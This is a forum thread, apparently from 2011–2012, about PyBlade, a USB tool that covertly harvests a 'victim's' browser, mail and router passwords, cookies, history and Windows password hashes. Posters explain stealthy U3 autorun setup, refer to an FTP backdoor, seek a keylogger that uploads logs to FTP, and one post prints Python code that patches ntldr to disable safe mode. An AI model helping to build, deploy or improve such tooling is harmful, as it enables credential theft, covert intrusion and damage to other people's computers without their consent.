Posted 13 March 2011 - 01:13 PM
idk how the pyload is configured (or built, I havent checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained about the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ that didn"t exist. I can only conclude that the pyload is made to be run only from the root of a drive (that's what sablefox said in his first post I believe). **if this aint right the rest of this part doesnt matter**
What the U3 shit does is placing it somewhere else and making it run fromthere. If the only reason u guys want it to be U3 is to make it autorunnable, well fine, here's a solution:
make a .BAT file that goes to the root of the drive and then runs the bex.exe (that is placed in the root of the drive) then make that bat into an .exe (bat to exe converter, google it) then convert the exe into an .u3p (PackageFactory, once again google it) then install the .u3p onto your u3 drive....
going to the root of the drive can be generally done in two ways:
.......................................(you got the point I guess)
if you got firefox password stealer problems, just get the newest version from their site....
Posted 06 June 2011 - 11:08 AM
-The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor
-Browser passwords can all be saved in one file, one file per browser, or both
-Dumps the saved cache for IE, Chrome, and Firefox
-Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working)
-Dumps the saved history for Chrome and Firefox in addition to IE
-Dumps passwords saved in popular mail clients
-Dumps password to access the victim's router (unfortunately only works on a small set of routers)
-Modified U3 support: The drive now executes FBex without launching the U3 launchpad, making it stealthier
-PWDump is the only bit of the program that isn't working on on 64 bit systems
-IE Cookie Viewer doesn't save
I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code, it didn't work. I rewrote it, it didn't work. I don't know what to do. Here's an odd little note, tough: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me...
Here is the modified U3 launcher, using Universal Customizer (Windows XP only):
Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made.
For those of you who can't run the above because you don't have XP, here is the .iso by itself:
It needs to be burned to the virtual optical drive of your U3 device.
Here is the blade, just extract to the root of the flash drive:
And finally, here's the source:
Does anyone know any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there was a good open source one, that'd be a cool thing to add.
*Fwew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx
Posted 07 June 2011 - 07:07 PM
Posted 23 June 2011 - 01:20 AM
And if you're feeling a bit evil, disable safe mode (XP/2k3):
# Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
Edited by sablefoxx, 23 June 2011 - 01:27 AM.
Posted 23 June 2011 - 08:50 PM
Posted 19 July 2011 - 05:53 PM
Mubix posted the link...
Not bad as a PyBlade add-on !
I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So lets say you added this onto Pyblade your usb would then dump the entire system memory so if the system had 8gbs of ram around 8 gbs of data would be dumped into your usb. For a tool like Pyblade which is intended to be inserted into a computer and remove quickly it would add a lot of time depending on the amount of Ram installed on the computer. Not saying that this tool is bad i just think that it was more intended for incident response teams. As they can use dumpit on there usb without any concern for time for how long the data will copy as long as they get their memory dump. Maybe dumpit can be added on to the incident response switchblade. Although this could very well change with usb 3.0 becoming mainstream as we could dump the memory a lot faster. But for now i would recommend dumpit for more incident response tool/usb kits.
That's my 2 cents anyway
Posted 20 July 2011 - 05:18 AM
Just set as an option,if You have time,8gb pendrive and 4gb victim's computer memory.
Posted 19 January 2012 - 09:19 AM
Posted 03 April 2012 - 02:20 PM
This is a great piece of software. Kudos.
I have a question somewhat related to the software, but also towards windows 7.
If a user does not have admin access on a computer running windows 7 64 bit, will they be able to run this off of a USB drive?
Posted 16 April 2012 - 02:08 PM
Posted 17 April 2012 - 10:31 AM
Posted 18 April 2012 - 07:24 PM
You need to go to nirsofter's site and download the latest files in there, IEPassview and FireFoxPassView and a few others. All the files in there are probably still from when XP was in it's middle stage.
So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/